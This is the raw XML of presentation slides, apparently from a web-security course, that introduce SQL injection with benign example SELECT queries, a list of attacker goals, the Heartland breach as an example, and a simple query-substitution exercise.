          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This is an example of where both queries need to be true.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Because there is only one user with the first name </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> with the password of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>asdf772nx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> any other Janes in the database would be excluded from this search. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1102" name="Google Shape;1102;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304950" y="1322975"/>
            <a:ext cx="8487900" cy="1367400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM site_data.users WHERE first='Jane' AND password='asdf772nx'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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6" name="Shape 1106"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Google Shape;1107;p64"/>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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108" name="Google Shape;1108;p6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2" name="Shape 1112"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113;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SQL Injections</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p6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SQL injections occur when users submit malicious input that servers use to perform a database query. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1115" name="Google Shape;1115;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16" name="Google Shape;1116;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1535650"/>
            <a:ext cx="9144000" cy="33708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800"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	Attackers can use SQL injections for the following: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Getting root shells on the server</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stealing sensitive data</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Forging Data</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQL injections are amongst the most dangerous attacks against web </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>application because they give attackers full access to an organization’s </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>data. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heartland</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payment System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> left over 100 million debit/credit card numbers </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>compromised, resulting in Heartland paying out over $140 million in damages. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1117" name="Google Shape;1117;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="608625" y="1535650"/>
            <a:ext cx="603250" cy="582799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1118" name="Google Shape;1118;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="481675" y="2746225"/>
            <a:ext cx="857151" cy="857151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1119" name="Google Shape;1119;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="545151" y="4026174"/>
            <a:ext cx="730199" cy="67985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3" name="Shape 1123"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124;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SQL Injections</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="12612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When</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> SQL is implemented safely, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>these attacks can be prevented. However, due to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>complexity of the code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>safety features are sometimes accidentally omitted. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126" name="Google Shape;1126;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27" name="Google Shape;1127;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1879550"/>
            <a:ext cx="9144000" cy="30267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800"/>
              <a:t>We’ll cover SQL injections “end-to-end” by focusing on: </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>How user input gets from a form in the browser to a web server. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>How servers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>generate SQL queries from user input. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>How malicious users can force the server to render their own queries, instead of just those normally provided by the web application. </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1" name="Shape 1131"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p6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33" name="Google Shape;1133;p67"/>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solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Input and HTTP Request</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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7" name="Shape 1137"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="Google Shape;1138;p68"/>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1139" name="Google Shape;1139;p6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40" name="Google Shape;1140;p68"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: SQL Submission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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, practice substituting values into SQL queries, just like servers do with user-submitted data.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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instructions sent via Slack.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4" name="Shape 1144"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p6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46" name="Google Shape;1146;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="3446775"/>
            <a:ext cx="3980400" cy="85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90000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SQL Substitutions</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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0" name="Shape 1150"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151;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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p7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54" name="Google Shape;1154;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="979800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.exploits WHERE name='eternal romance';</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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8" name="Shape 1158"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159" name="Google Shape;1159;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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161;p7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62" name="Google Shape;1162;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490650" y="2836050"/>
            <a:ext cx="8223600" cy="197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highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME = 'eternal romance'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
